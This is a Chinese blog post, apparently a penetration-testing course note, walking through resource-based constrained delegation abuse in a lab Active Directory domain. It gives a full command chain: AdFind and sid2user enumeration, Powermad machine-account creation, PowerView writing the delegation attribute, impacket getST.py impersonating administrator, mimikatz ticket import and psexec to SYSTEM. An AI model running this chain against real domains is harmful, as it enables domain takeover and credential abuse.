第136天:内网安全-横向移动&资源约束委派

xiaojiesec2024-08-27 17:03

利用条件

首先是dc域控主机必须是win2012以上的主机

其次是域内有一个账户,可以同时登录两台主机

利用 jie 可以登录 win2008 也可以登录 win7

资源委派不需要设置委派,默认即可

实验复现

复现环境

通过网盘分享的文件:136-xiaodi.local内网域环境镜像文件

链接: https://pan.baidu.com/s/1H3ypkEoTiJMbwfMxJ7JMCA?pwd=wnra 提取码: wnra

这里在本地复现,cs中操作时一致的

使用adfind工具查询域内是否有SID一致的主机,并获取主机名

复制代码 
AdFind.exe -h DC的ip -b "DC=域,DC=控" -f "objectClass=computer" mS-DS-CreatorSID
AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID

要利用资源委派就得知道这个用户是谁,根据这个sid,利用工具sid2user.exe去查询用户名,需要删除sid的s-1以及后面的所有横杠

复制代码 
sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

那么如果你拿到的就是dbadmin用户,就可以利用该账户从web渗透到dc,没拿到就得想办法去获取这个用户

利用这个工具去执行下面的攻击

https://gitcode.com/gh_mirrors/po/Powermad/overview?utm_source=csdn_github_accelerator&isLogin=1

添加机器

Set-ExecutionPolicy Bypass -Scope Process ##设置允许执行脚本

import-module .\Powermad.ps1 ##导入模块

New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force) ##创建一个用户为test1的,然后密码是123456

执行完成以后域控内有一个test1主机

获取新主机的sid值

Set-ExecutionPolicy Bypass -Scope Process

Import-Module .\PowerView.ps1

Get-NetComputer test1 -Properties objectsid

修改目标主机的属性

Set-ExecutionPolicy Bypass -Scope Process

import-module .\powerview.ps1

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1602)" ##(刚才获得的sid值)

SDBytes = New-Object byte\[\] (SD.BinaryLength)

SD.GetBinaryForm(SDBytes, 0)

Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose ##(DATA是攻击的目标主机)

检验是否配置成功

复制代码 
Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity

这个时候就可以生成票据去执行后续操作了,由于需要用到python程序,所以这里我还是用cs上线生成sockets代理

利用impack套件里面的getst.py获得票据,这里生成票据的时候不管你是再本地还是在代理都要记得设置hosts文件,否则无效

复制代码 
proxychains4 python getST.py -dc-ip 192.168.3.33 xiaodi.local/test1\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

生成了一个票据,上传到服务器,利用mimikatz导入票据

复制代码 
mimikatz kerberos::ptc administrator.ccache

再访问

提升权限

复制代码 
python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass   ##可提升为system权限。
相关推荐
用户962377954484 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主5 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954487 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机7 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机7 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954488 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star8 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954488 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher9 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行12 天前
网络安全总结
安全·web安全
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03本地部署 OpenClaw + DeepSeek-R1 完全指南04OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录05Window 10部署openclaw报错node.exe : npm error code 12806OpenClaw 接入 QQ Bot 完整实践指南07OpenClaw 飞书机器人不回复消息?3 小时踩坑总结08npm-error code 128问题解决方法09OpenClaw macOS 完整安装与本地模型配置教程(实战版)10OpenClaw + 飞书(Feishu)环境搭建指南